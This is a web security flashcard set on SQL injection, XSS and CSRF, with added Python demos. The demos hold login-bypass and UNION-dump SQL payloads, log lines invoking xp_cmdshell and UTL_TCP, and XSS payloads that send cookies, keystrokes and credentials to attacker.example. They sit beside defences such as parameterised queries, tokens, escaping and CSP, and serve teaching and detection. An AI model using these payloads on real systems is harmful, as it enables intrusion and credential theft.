Web Security Pt. 2 Flashcards

1
Q

What is SQLi?

A

SQL Injection: an attack in which untrusted input changes the structure of a SQL query the application sends to its database, so the attacker's text is executed as part of the query instead of being treated as data.

2
Q

What is SQLi caused by?

A

Missing or insufficient input validation combined with the application building its queries dynamically, by concatenating user-supplied input into the SQL string instead of passing it to the database as a bound parameter.

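The cause described above, as an added example (not code from the original flashcards): a login lookup built by string formatting, the same lookup with bound parameters, and two payloads that only the first version accepts. Python's built-in sqlite3 module stands in for the MySQL backend these cards use; the user table and its credentials are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory user table (sample data, not from the original page).
    # Plaintext passwords are used only to keep the injection itself visible.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cr3t"), ("alice", "hunter2")],
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The bug: user input is pasted into the SQL text, so a quote in the input
    # closes the string literal and the rest becomes query syntax.
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The fix: bound parameters. The query text is fixed and the driver sends the
    # values separately, so no input can alter the statement's structure.
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Demonstration payloads (constructed). "-- " starts a SQL comment, which
# discards the password check that follows it in the concatenated query.
BYPASS_USERNAME = "admin' -- "   # log in as admin without the password
TAUTOLOGY = "' OR 1=1 -- "       # WHERE clause is true for every row


if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_login(conn, BYPASS_USERNAME, "wrong"))  # True
    print(vulnerable_login(conn, TAUTOLOGY, "wrong"))        # True
    print(safe_login(conn, BYPASS_USERNAME, "wrong"))        # False
    print(safe_login(conn, "alice", "hunter2"))              # True
```

The resulting SQL for the first payload is `SELECT id FROM users WHERE username = 'admin' -- ' AND password = 'wrong'`; everything after `--` is a comment. With bound parameters the same text is compared literally against the username column and matches nothing.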
3
Q

What info does user() retrieve?

A

The MySQL account the application is connected as, in user@host form, e.g. root@localhost (a root connection means injected queries run with full DBMS privileges). user(), database(), @@version, @@hostname and @@datadir are MySQL-specific; other DBMSs expose the same information under different names.

4
Q

What info does database() retrieve?

A

The name of the database the application is currently using, e.g. 'nowasp'.

5
Q

What info does @@version retrieve?

A

The MySQL server version string, e.g. '5.7.19'; the exact version tells the attacker which syntax, functions and known weaknesses apply.

6
Q

What info does @@hostname retrieve?

A

The hostname of the machine running the MySQL server, e.g. 'dbmachine'.

7
Q

What info does @@datadir retrieve?

A

The path of the MySQL data directory on the server's filesystem, e.g. '/usr/local/var/mysql/'; this is where the database files live and is a useful reference point when an injection can read or write files on the host.

8
Q

When does In-band SQLi occur?

A

When the attacker uses the same channel to deliver the payload and to read back the results, i.e. the extracted data appears in the application's normal response: error-based SQLi, where data leaks through a DBMS error message the application echoes, and UNION-based SQLi, where the attacker's rows are appended to the legitimate result set.

9
Q

When does out-of-band SQLi occur?

A

When the attacker cannot get results back through the application's response and has to use a different channel, typically by making the database server itself open a connection (DNS, HTTP or raw TCP) to an attacker-controlled host and carry the query results in that request.

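The two in-band techniques named on card 8, worked through as an added example (not from the original flashcards) against a search endpoint that both concatenates input and echoes database errors. Python's sqlite3 stands in for MySQL, so sqlite_version() and the sqlite_master catalogue play the roles of @@version and information_schema; the tables and data are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample schema and rows (not from the original page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO products (name, price) VALUES (?, ?)",
        [("apple", 1.0), ("pear", 1.5)],
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cr3t')")
    return conn


def search(conn: sqlite3.Connection, term: str) -> dict:
    """Vulnerable search endpoint: concatenates the term into the query and,
    on failure, returns the raw DBMS error text to the client. Both mistakes
    are needed for the two in-band techniques below."""
    query = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    try:
        return {"rows": conn.execute(query).fetchall()}
    except sqlite3.Error as exc:
        return {"error": str(exc)}


def union_dump(conn: sqlite3.Connection, columns: str, table: str) -> list:
    # UNION-based: the injected SELECT must return the same number of columns
    # as the original (2 here); its rows come back mixed into the normal
    # result set. The trailing "-- " comments out the original query's "%'".
    payload = f"' UNION SELECT {columns} FROM {table} -- "
    return search(conn, payload)["rows"]


def fingerprint(conn: sqlite3.Connection) -> str:
    # Same trick used to pull server metadata; the 'v' marker in the second
    # column lets us pick the injected row out of the legitimate ones.
    rows = search(conn, "' UNION SELECT sqlite_version(), 'v' -- ")["rows"]
    return next(name for name, marker in rows if marker == "v")


def error_based(conn: sqlite3.Connection) -> str:
    # Error-based: a single stray quote breaks the syntax and the DBMS error
    # text comes back in the same response, confirming the injection point and
    # revealing which database engine is behind it.
    return search(conn, "'")["error"]


if __name__ == "__main__":
    conn = make_db()
    print(union_dump(conn, "username, password", "users"))
    print(union_dump(conn, "name, sql", "sqlite_master"))  # DDL of every table
    print(fingerprint(conn))
    print(error_based(conn))
```

The second union_dump call shows why enumerating the catalogue comes first in practice: once the table and column names are known, the credential dump is a one-line payload. On MySQL the equivalent targets are information_schema.tables and information_schema.columns.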
10
Q

What does xp_cmdshell do?

A

xp_cmdshell is a Microsoft SQL Server extended stored procedure that runs an operating-system command on the database host from inside a query. It is disabled by default and must be enabled through sp_configure, but if the injected context has the privileges to do that, an SQLi turns into remote command execution.

11
Q

What does UTL_TCP do?

A

UTL_TCP is an Oracle PL/SQL package that lets database code open a TCP/IP connection to an external server; in an injection it provides the out-of-band channel for sending query results to an attacker-controlled host.

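Since xp_cmdshell and UTL_TCP have no business appearing in a normal web request, they make easy detection targets alongside the in-band primitives on the earlier cards. As an added example (not from the original flashcards), a small signature scanner for the identifiers named on this page, run over constructed access-log lines; the rule names, severities, log format and the double URL-decoding step are assumptions about how such a check would be deployed.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the primitives discussed on this page: (name, regex, severity).
# Severity labels are an assumption for the example.
RULES = [
    ("oob_mssql_xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I), "critical"),
    ("oob_oracle_utl_tcp", re.compile(r"\butl_tcp\b", re.I), "critical"),
    ("inband_union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I), "high"),
    (
        "inband_mysql_metadata",
        re.compile(r"@@(version|hostname|datadir)\b|\b(user|database)\(\)", re.I),
        "medium",
    ),
    ("inband_tautology", re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I), "medium"),
]


def normalize(raw: str) -> str:
    # Decode twice: attackers double-encode to get past naive filters, and a
    # second pass over already-plain text changes nothing of interest.
    return unquote_plus(unquote_plus(raw))


def scan_line(line: str) -> list:
    """Return [(rule_name, severity), ...] for every rule that fires."""
    text = normalize(line)
    return [(name, sev) for name, rx, sev in RULES if rx.search(text)]


def scan_log(lines) -> list:
    """Return [(line_number, rule_name, severity), ...] across the whole log."""
    findings = []
    for n, line in enumerate(lines, 1):
        for name, sev in scan_line(line):
            findings.append((n, name, sev))
    return findings


# Constructed sample request lines (not real traffic). 203.0.113.5 is a
# documentation address standing in for an attacker-controlled host.
SAMPLE_LOG = [
    "GET /search?q=apple HTTP/1.1",
    "GET /search?q=%27+UNION+SELECT+user%28%29%2C%40%40version--+ HTTP/1.1",
    "POST /login username=admin%27%3B+EXEC+xp_cmdshell+%27whoami%27-- HTTP/1.1",
    "GET /item?id=1%27%3BBEGIN+UTL_TCP.OPEN_CONNECTION%28%27203.0.113.5%27%2C4444%29%3BEND%3B-- HTTP/1.1",
    "GET /login?user=%27+OR+1%3D1--+ HTTP/1.1",
]


if __name__ == "__main__":
    for n, name, sev in scan_log(SAMPLE_LOG):
        print(f"line {n}: {name} [{sev}]")
```

Signature matching like this is a tripwire, not a control: it catches the textbook payloads on these cards and will miss obfuscated ones, so it belongs in a SIEM rule set next to the real fix (parameterised queries), not in place of it.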
12
Q

What does XSS exploit?

A

The trust a user, and the user's browser, places in a website: script injected into the page runs in the site's origin with access to the user's session, and the browser cannot distinguish it from the site's own code.

13
Q

What does CSRF exploit?

A

The trust a website places in the user's browser: the browser automatically attaches the session cookie to every request to the site, so the site cannot tell whether a request was intended by the user or was triggered by a page the attacker controls.

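One way to stop the forged request described on card 13, as an added example (not code from the original flashcards): a synchronizer token bound to the session with an HMAC, plus an Origin/Referer check as a second layer. SERVER_SECRET, the session ids, the site name bank.example and the handle_transfer endpoint are all hypothetical.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Hypothetical server-side key; in production this comes from a secret store.
SERVER_SECRET = b"replace-with-a-random-32-byte-key"
SITE = "https://bank.example"  # assumed origin of the protected application


def issue_csrf_token(session_id: str) -> str:
    # Synchronizer-token pattern, stateless variant: HMAC(secret, session:nonce).
    # A third-party page never sees the HTML that embeds the token and cannot
    # compute the MAC, so it cannot include a valid token in its forged form.
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return hmac.compare_digest(expected.hexdigest(), mac)  # constant-time compare


def origin_allowed(headers: dict) -> bool:
    # Defence in depth: browsers set Origin (or at least Referer) on cross-site
    # POSTs and a page on another site cannot forge either header.
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE


def handle_transfer(session_id: str, form: dict, headers: dict) -> str:
    """Hypothetical state-changing endpoint; returns an HTTP-style status line."""
    if not origin_allowed(headers):
        return "403 bad origin"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "403 bad csrf token"
    return f"200 transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    token = issue_csrf_token("sess-1")
    legit = {"csrf_token": token, "amount": "100", "to": "bob"}
    forged = {"amount": "100", "to": "mallory"}  # built by the attacker's page
    print(handle_transfer("sess-1", legit, {"Origin": SITE}))
    print(handle_transfer("sess-1", forged, {"Origin": "https://evil.example"}))
    print(handle_transfer("sess-1", forged, {"Origin": SITE}))  # no token
```

Rejecting requests with neither Origin nor Referer is the strict choice; it blocks some privacy-configured clients, which is why the token check, not the header check, is the control that must hold. Setting the session cookie with SameSite=Lax or Strict removes the browser's automatic cookie attachment that CSRF depends on in the first place.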
14
Q

What is cookie theft?

A

An XSS payload reads the cookies the victim's browser holds for the site via document.cookie and sends them to the attacker, who can replay them to hijack the session (cookies flagged HttpOnly are not exposed to document.cookie).

15
Q

What is keylogging?

A

An XSS payload registers a keyboard event listener on the page with addEventListener and forwards every keystroke the victim types to the attacker, capturing passwords and anything else entered into the page.

16
Q

What is phishing?

A

An XSS payload uses DOM manipulation to insert a fake login form into the legitimate page; because the form appears at the real site's URL, the victim is likely to enter credentials, which are then submitted to the attacker.
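The three XSS outcomes on cards 14 to 16 and the controls that defeat them, as an added example (not code from the original flashcards): the unsafe rendering that lets a payload through beside the encoded form, and the cookie and Content-Security-Policy headers that limit what a payload can do even when one does run. The payloads, the host attacker.example and the cookie name are constructed for the example.

```python
import html

# Constructed payloads, one per outcome on the cards: cookie theft via
# document.cookie, a keylogger via addEventListener, and a fake login form
# via DOM manipulation. attacker.example is a placeholder host.
COOKIE_THEFT = (
    "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
)
KEYLOGGER = (
    "<script>document.addEventListener('keydown',"
    "e=>fetch('https://attacker.example/k?'+e.key))</script>"
)
PHISH = (
    "<script>document.body.innerHTML="
    "'<form action=https://attacker.example/login>...</form>'</script>"
)


def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: untrusted text is pasted straight into the HTML, so the
    # <script> in a comment executes in the site's origin for every viewer.
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    # Output encoding for an HTML text-node context: <, >, &, " and ' become
    # entities and the browser renders the payload as visible text. Attribute,
    # JavaScript and URL contexts each need their own encoder; this one is
    # only correct for element content.
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def session_cookie_header(session_id: str) -> str:
    # HttpOnly keeps the cookie out of document.cookie, so COOKIE_THEFT gets
    # nothing even if it runs; Secure stops plaintext transmission and
    # SameSite limits cross-site sending (which also helps against CSRF).
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def csp_header() -> str:
    # Without 'unsafe-inline' the browser refuses inline <script> blocks and
    # inline handlers, so all three payloads fail to execute; connect-src
    # blocks the fetch() in KEYLOGGER, form-action blocks the PHISH form's
    # submission, and img-src blocks the beacon in COOKIE_THEFT.
    return (
        "Content-Security-Policy: default-src 'self'; script-src 'self'; "
        "connect-src 'self'; img-src 'self'; form-action 'self'"
    )


def is_neutralised(rendered: str) -> bool:
    """True when no raw <script> tag survives in the rendered HTML."""
    return "<script" not in rendered.lower()


if __name__ == "__main__":
    for payload in (COOKIE_THEFT, KEYLOGGER, PHISH):
        print(is_neutralised(render_comment_unsafe(payload)),
              is_neutralised(render_comment_safe(payload)))
    print(session_cookie_header("abc123"))
    print(csp_header())
```

Encoding at output time is the primary control because it works regardless of where the data came from; the cookie flags and CSP are there for the day an encoder is forgotten in one template.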